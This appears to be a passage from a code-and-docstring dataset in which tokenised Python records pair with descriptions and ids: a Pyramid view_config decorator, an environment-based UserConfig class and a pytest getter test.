self.custom_predicates = custom_predicates <NEW_LINE> self.decorator = decorator <NEW_LINE> self.mapper = mapper <NEW_LINE> <DEDENT> def __call__(self, wrapped): <NEW_LINE> <INDENT> settings = self.__dict__.copy() <NEW_LINE> def callback(context, name, ob): <NEW_LINE> <INDENT> renderer = settings.get('renderer') <NEW_LINE> if isinstance(renderer, basestring): <NEW_LINE> <INDENT> renderer = RendererHelper(name=renderer, package=info.module, registry=context.config.registry) <NEW_LINE> <DEDENT> settings['renderer'] = renderer <NEW_LINE> context.config.add_view(view=ob, **settings) <NEW_LINE> <DEDENT> info = self.venusian.attach(wrapped, callback, category='pyramid') <NEW_LINE> if info.scope == 'class': <NEW_LINE> <INDENT> if settings['attr'] is None: <NEW_LINE> <INDENT> settings['attr'] = wrapped.__name__ <NEW_LINE> <DEDENT> <DEDENT> settings['_info'] = info.codeinfo <NEW_LINE> return wrapped | A function, class or method :term:`decorator` which allows a
developer to create view registrations nearer to a :term:`view
callable` definition than use :term:`imperative
configuration` to do the same.
For example, this code in a module ``views.py``::
from resources import MyResource
@view_config(name='my_view', context=MyResource, permission='read',
route_name='site1')
def my_view(context, request):
return 'OK'
Might replace the following call to the
:meth:`pyramid.config.Configurator.add_view` method::
import views
from resources import MyResource
config.add_view(views.my_view, context=MyResource, name='my_view',
permission='read', 'route_name='site1')
.. note: :class:`pyramid.view.view_config` is also importable, for
backwards compatibility purposes, as the name
:class:`pyramid.view.bfg_view`.
The following arguments are supported as arguments to
:class:`pyramid.view.view_config`: ``context``, ``permission``, ``name``,
``request_type``, ``route_name``, ``request_method``, ``request_param``,
``containment``, ``xhr``, ``accept``, ``header``, ``path_info``,
``custom_predicates``, ``decorator``, and ``mapper``.
The meanings of these arguments are the same as the arguments passed to
:meth:`pyramid.config.Configurator.add_view`.
See :ref:`mapping_views_using_a_decorator_section` for details about
using :class:`view_config`. | 62599087ec188e330fdfa44f |
class UserConfig(dict): <NEW_LINE> <INDENT> def init(self): <NEW_LINE> <INDENT> envs = { k.split("DIRECTOR_")[1]: v for k, v in os.environ.items() if k.startswith("DIRECTOR_") and k not in HIDDEN_CONFIG } <NEW_LINE> super().__init__(**envs) <NEW_LINE> <DEDENT> def __getattr__(self, attr): <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> return self[attr] <NEW_LINE> <DEDENT> except KeyError as e: <NEW_LINE> <INDENT> raise AttributeError(f"Config '{e.args[0]}' not defined") | Handle the user configuration | 62599087be7bc26dc9252c27 |
@pytest.mark.usefixtures("set_device_parameters") <NEW_LINE> class TestGetter(BaseTestGetters): <NEW_LINE> <INDENT> def test_method_signatures(self): <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> super(TestGetter, self).test_method_signatures() <NEW_LINE> <DEDENT> except AssertionError: <NEW_LINE> <INDENT> pass | Test get_* methods. | 625990877cff6e4e811b75e5 |
Subsets and Splits